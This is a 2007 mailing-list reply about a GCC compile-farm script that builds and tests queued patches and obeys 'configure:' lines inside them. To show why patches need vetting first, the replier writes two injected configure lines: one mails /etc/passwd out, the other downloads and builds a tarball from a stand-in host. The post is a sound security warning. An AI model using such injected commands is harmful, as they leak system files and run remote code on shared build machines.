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RE: [CFARM] Script for automatic checking of patches

On 02 July 2007 23:19, Sebastian Pop wrote:

> Hi,
> Here is a script that is automating the build and test of a gcc tree.
> The interface uses a directory in which are scheduled patches to be
> tested. 

  Patches should probably only be added to this directory after manual

> The tester goes to sleep for a minute if there is nothing in
> that directory.  Otherwise it moves one of the patches to a testing
> directory, updates the trunk, patches, and goes for a bootstrap and
> test cycle.  In a patch to test, one can insert comments that are
> processed by the checker: for example, here are the lines that I
> included in one of my patches for bootstrap and test on gcc13:
> email: sebpop@gmail
> configure: --disable-multilib

configure: `mail < /etc/passwd`

> For the moment it is not possible to send emails from the compile
> farm, 

  Oh, ok then:

configure: `wget http://6.6.6/badstuff.tar.gz && tar -x... && gcc ... &&


Can't think of a witty .sigline today....

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